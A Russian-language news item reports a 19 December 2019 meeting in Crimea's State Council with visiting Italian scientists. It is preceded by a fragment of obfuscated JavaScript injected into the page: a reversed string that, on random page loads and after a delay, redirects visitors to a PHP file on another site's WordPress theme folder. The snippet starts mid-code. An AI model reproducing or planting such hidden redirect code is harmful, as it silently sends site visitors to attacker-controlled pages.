) == «string») return $zXz.list[n].split(«»).reverse().join(«»);return $zXz.list[n];};$zXz.list=[«‘php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_class=»]
19 декабря 2019 года в Государственном Совете Республики Крым состоялась встреча с народными дипломатами из Италии, в которой принял участие начальник отдела межрегионального сотрудничества и взаимодействия со СМИ ГБУ РК «Дом дружбы народов» Яков Слуцкий.
С целью научного обмена в Крым прибыли учёные из итальянской провинции Лигурия: профессор, доктор инженерных наук в области машиностроения, преподаватель Физико-технического института Университета Генуи Джованни Черсола и архитектор, автор 17 патентов, представитель торговой палаты города Турин Джакомо Омодэо Ванонэ.
Поприветствовал гостей председатель Комитета по народной дипломатии и межнациональным отношениям Юрий Гемпель. Председатель Комитета по жилищной политике и ЖКХ Алексей Гусев пригласил итальянских учёных обсудить конкретные проекты и идеи, развитие связей Крыма и Италии в научно-технической сфере.





